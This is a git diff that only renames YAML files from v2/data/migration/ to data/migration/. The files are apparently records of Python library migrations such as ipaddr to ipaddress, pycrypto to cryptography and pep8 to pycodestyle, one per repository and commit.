diff --git a/v2/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml b/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml
similarity index 100%
rename from v2/data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml
rename to data/migration/hubstorage__scrapinghub__scrapinghub@scrapinghub-entrypoint-scrapy__80b2262.yaml
diff --git a/v2/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml b/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml
similarity index 100%
rename from v2/data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml
rename to data/migration/hubstorage__scrapinghub__scrapy-plugins@scrapy-pagestorage__ce31d53.yaml
diff --git a/v2/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml b/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml
similarity index 100%
rename from v2/data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml
rename to data/migration/huey__celery__lonelam@onlinejudgeshu__b687d20.yaml
diff --git a/v2/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml b/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml
rename to data/migration/ipaddr__ipaddress__google@capirca__eb768ea.yaml
diff --git a/v2/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml b/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml
rename to data/migration/ipaddr__ipaddress__reannz@faucet__4a23ef8.yaml
diff --git a/v2/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml b/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml
rename to data/migration/ipaddr__ipaddress__rvojcik@rtapi__2c25c05.yaml
diff --git a/v2/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml b/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml
rename to data/migration/ipaddr__netaddr__openstack@deb-designate__eb16b1e.yaml
diff --git a/v2/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml b/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml
rename to data/migration/ipaddr__netaddr__openstack@fuel-devops__5d0df07.yaml
diff --git a/v2/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml b/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml
rename to data/migration/ipaddr__netaddr__openstack@wsme__002473c.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml b/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml
rename to data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml b/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml
rename to data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml b/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml
rename to data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml b/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml
rename to data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml b/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml
rename to data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml b/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml
rename to data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml
diff --git a/v2/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml b/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml
similarity index 100%
rename from v2/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml
rename to data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml
diff --git a/v2/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml b/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml
similarity index 100%
rename from v2/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml
rename to data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml
diff --git a/v2/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml b/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml
similarity index 100%
rename from v2/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml
rename to data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml
diff --git a/v2/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml b/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml
similarity index 100%
rename from v2/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml
rename to data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml
diff --git a/v2/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml b/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml
similarity index 100%
rename from v2/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml
rename to data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml
diff --git a/v2/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml b/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml
similarity index 100%
rename from v2/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml
rename to data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml
diff --git a/v2/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml b/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml
similarity index 100%
rename from v2/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml
rename to data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml
diff --git a/v2/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml b/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml
similarity index 100%
rename from v2/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml
rename to data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml
diff --git a/v2/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml b/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml
similarity index 100%
rename from v2/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml
rename to data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml
diff --git a/v2/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml b/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml
similarity index 100%
rename from v2/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml
rename to data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml
diff --git a/v2/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml b/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml
similarity index 100%
rename from v2/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml
rename to data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml
diff --git a/v2/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml b/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml
similarity index 100%
rename from v2/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml
rename to data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml
diff --git a/v2/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml b/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml
similarity index 100%
rename from v2/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml
rename to data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml
diff --git a/v2/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml b/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml
similarity index 100%
rename from v2/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml
rename to data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml
diff --git a/v2/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml b/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml
similarity index 100%
rename from v2/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml
rename to data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml
diff --git a/v2/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml b/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml
similarity index 100%
rename from v2/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml
rename to data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml
diff --git a/v2/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml b/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml
similarity index 100%
rename from v2/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml
rename to data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml
diff --git a/v2/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml b/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml
similarity index 100%
rename from v2/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml
rename to data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml
diff --git a/v2/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml b/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml
similarity index 100%
rename from v2/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml
rename to data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml
diff --git a/v2/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml b/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml
similarity index 100%
rename from v2/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml
rename to data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml
diff --git a/v2/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml b/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml
similarity index 100%
rename from v2/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml
rename to data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml
diff --git a/v2/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml b/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml
similarity index 100%
rename from v2/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml
rename to data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml
diff --git a/v2/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml b/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml
similarity index 100%
rename from v2/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml
rename to data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml
diff --git a/v2/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml b/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml
similarity index 100%
rename from v2/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml
rename to data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml
diff --git a/v2/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml b/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml
similarity index 100%
rename from v2/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml
rename to data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml
diff --git a/v2/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml b/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml
similarity index 100%
rename from v2/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml
rename to data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml
diff --git a/v2/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml b/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml
similarity index 100%
rename from v2/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml
rename to data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml
diff --git a/v2/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml b/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml
similarity index 100%
rename from v2/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml
rename to data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml
diff --git a/v2/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml b/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml
similarity index 100%
rename from v2/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml
rename to data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml
diff --git a/v2/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml b/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml
similarity index 100%
rename from v2/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml
rename to data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml
diff --git a/v2/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml b/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml
similarity index 100%
rename from v2/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml
rename to data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml
diff --git a/v2/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml b/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml
similarity index 100%
rename from v2/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml
rename to data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml
diff --git a/v2/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml b/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml
similarity index 100%
rename from v2/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml
rename to data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml
diff --git a/v2/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml b/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml
similarity index 100%
rename from v2/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml
rename to data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml
diff --git a/v2/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml b/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml
similarity index 100%
rename from v2/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml
rename to data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml
diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml b/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml
similarity index 100%
rename from v2/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml
rename to data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml
diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml b/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml
similarity index 100%
rename from v2/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml
rename to data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml
diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml b/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml
similarity index 100%
rename from v2/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml
rename to data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml
diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml b/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml
similarity index 100%
rename from v2/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml
rename to data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml
diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml b/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml
similarity index 100%
rename from v2/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml
rename to data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml
diff --git a/v2/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml b/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml
similarity index 100%
rename from v2/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml
rename to data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml
diff --git a/v2/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml b/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml
similarity index 100%
rename from v2/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml
rename to data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml
diff --git a/v2/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml b/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml
similarity index 100%
rename from v2/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml
rename to data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml
diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml b/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml
similarity index 100%
rename from v2/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml
rename to data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml
diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml b/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml
similarity index 100%
rename from v2/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml
rename to data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml
diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml b/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml
similarity index 100%
rename from v2/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml
rename to data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml
diff --git a/v2/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml b/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml
similarity index 100%
rename from v2/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml
rename to data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml b/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml
rename to data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml b/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml
rename to data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml b/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml
rename to data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml b/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml
rename to data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml b/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml
rename to data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml b/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml
rename to data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml
diff --git a/v2/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml b/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml
similarity index 100%
rename from v2/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml
rename to data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml
diff --git a/v2/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml b/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml
similarity index 100%
rename from v2/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml
rename to data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml
diff --git a/v2/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml b/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml
similarity index 100%
rename from v2/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml
rename to data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml
diff --git a/v2/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml b/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml
similarity index 100%
rename from v2/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml
rename to data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml
diff --git a/v2/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml b/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml
similarity index 100%
rename from v2/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml
rename to data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml
diff --git a/v2/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml b/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml
similarity index 100%
rename from v2/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml
rename to data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml
diff --git a/v2/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml b/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml
similarity index 100%
rename from v2/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml
rename to data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml
diff --git a/v2/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml b/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml
similarity index 100%
rename from v2/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml
rename to data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml
diff --git a/v2/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml b/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml
similarity index 100%
rename from v2/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml
rename to data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml
diff --git a/v2/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml b/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml
similarity index 100%
rename from v2/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml
rename to data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml
diff --git a/v2/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml b/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml
similarity index 100%
rename from v2/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml
rename to data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml
diff --git a/v2/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml b/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml
similarity index 100%
rename from v2/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml
rename to data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml
diff --git a/v2/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml b/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml
similarity index 100%
rename from v2/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml
rename to data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml b/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml
rename to data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml b/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml
similarity index 100%
rename from v2/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml
rename to data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml
diff --git a/v2/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml b/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml
similarity index 100%
